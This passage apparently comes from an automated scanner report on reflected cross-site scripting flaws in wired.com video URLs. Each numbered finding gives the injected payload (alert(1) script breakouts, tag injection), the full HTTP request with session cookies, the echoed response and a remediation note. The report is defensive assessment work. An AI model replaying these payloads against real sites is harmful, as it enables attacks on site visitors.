<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos2bdf6"><a>7f3d840db93 c_latest">
...[SNIP]...

1.1202. http://www.wired.com/video/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7dacc"><a>bbb6c95b245 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos/latest7dacc"><a>bbb6c95b245/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:42:41 GMT
Date: Mon, 22 Nov 2010 00:37:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106811


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos c_latest7dacc"><a>bbb6c95b245">
...[SNIP]...

1.1203. http://www.wired.com/video/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c4ab"-alert(1)-"e3c870d3eb1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest4c4ab"-alert(1)-"e3c870d3eb1/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:43:26 GMT
Date: Mon, 22 Nov 2010 00:38:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106798


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","672339556001","1815816633","latest4c4ab"-alert(1)-"e3c870d3eb1","video","noire-thriller-set-in-seedy-los-angeles-of-the-40s"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1204. http://www.wired.com/video/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23e36"-alert(1)-"151a9a358c9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/181581663323e36"-alert(1)-"151a9a358c9/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:43:48 GMT
Date: Mon, 22 Nov 2010 00:38:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106777


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","672339556001","latest","181581663323e36"-alert(1)-"151a9a358c9","video","noire-thriller-set-in-seedy-los-angeles-of-the-40s"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1205. http://www.wired.com/video/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload afd86"-alert(1)-"f423dd03819 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40safd86"-alert(1)-"f423dd03819/672339556001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:44:17 GMT
Date: Mon, 22 Nov 2010 00:39:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106706


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","672339556001","latest","noire-thriller-set-in-seedy-los-angeles-of-the-40safd86"-alert(1)-"f423dd03819","1815816633","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1206. http://www.wired.com/video/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ffd3d"-alert(1)-"0d025cc697d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001ffd3d"-alert(1)-"0d025cc697d HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:44:29 GMT
Date: Mon, 22 Nov 2010 00:39:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106777


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","latest","1815816633","672339556001ffd3d"-alert(1)-"0d025cc697d","video","noire-thriller-set-in-seedy-los-angeles-of-the-40s"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1207. http://www.wired.com/video/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 8b732--><script>alert(1)</script>8de2758f227 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /video8b732--><script>alert(1)</script>8de2758f227/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29483
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:45:59 GMT
Date: Mon, 22 Nov 2010 00:40:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /video8b732--><script>alert(1)</script>8de2758f227/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001
-->
...[SNIP]...

1.1208. http://www.wired.com/video/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4941e"><a>8a492733e49 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video4941e"><a>8a492733e49/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29444
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:44:53 GMT
Date: Mon, 22 Nov 2010 00:39:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video4941e"><a>8a492733e49 ss_latest-videos c_latest">
...[SNIP]...

1.1209. http://www.wired.com/video/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99d79"><a>d7ed01c7cc0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos99d79"><a>d7ed01c7cc0/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=271
Expires: Mon, 22 Nov 2010 00:45:36 GMT
Date: Mon, 22 Nov 2010 00:41:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106780


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos99d79"><a>d7ed01c7cc0 c_latest">
...[SNIP]...

1.1210. http://www.wired.com/video/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9fa56"-alert(1)-"1f38c6a65a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos9fa56"-alert(1)-"1f38c6a65a0/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=273
Expires: Mon, 22 Nov 2010 00:46:43 GMT
Date: Mon, 22 Nov 2010 00:42:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106779


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
ype="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest","660683999001","1815816633","the-gun-of-the-future-for-the-truck-of-the-future","latest-videos9fa56"-alert(1)-"1f38c6a65a0","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1211. http://www.wired.com/video/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9dbe"><a>ecb0d4f8c5a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos/latestc9dbe"><a>ecb0d4f8c5a/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:47:13 GMT
Date: Mon, 22 Nov 2010 00:42:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106790


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos c_latestc9dbe"><a>ecb0d4f8c5a">
...[SNIP]...

1.1212. http://www.wired.com/video/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload beb59"-alert(1)-"95d7e2d9dcd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latestbeb59"-alert(1)-"95d7e2d9dcd/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=278
Expires: Mon, 22 Nov 2010 00:47:59 GMT
Date: Mon, 22 Nov 2010 00:43:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106804


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","660683999001","1815816633","latestbeb59"-alert(1)-"95d7e2d9dcd","the-gun-of-the-future-for-the-truck-of-the-future","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1213. http://www.wired.com/video/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8aeb1"-alert(1)-"b7856853cc1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/18158166338aeb1"-alert(1)-"b7856853cc1/the-gun-of-the-future-for-the-truck-of-the-future/660683999001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:48:35 GMT
Date: Mon, 22 Nov 2010 00:43:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106796


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","latest","660683999001","18158166338aeb1"-alert(1)-"b7856853cc1","the-gun-of-the-future-for-the-truck-of-the-future","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1214. http://www.wired.com/video/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6894c"-alert(1)-"5f54f5d90f1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future6894c"-alert(1)-"5f54f5d90f1/660683999001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=298
Expires: Mon, 22 Nov 2010 00:48:42 GMT
Date: Mon, 22 Nov 2010 00:43:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106751


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

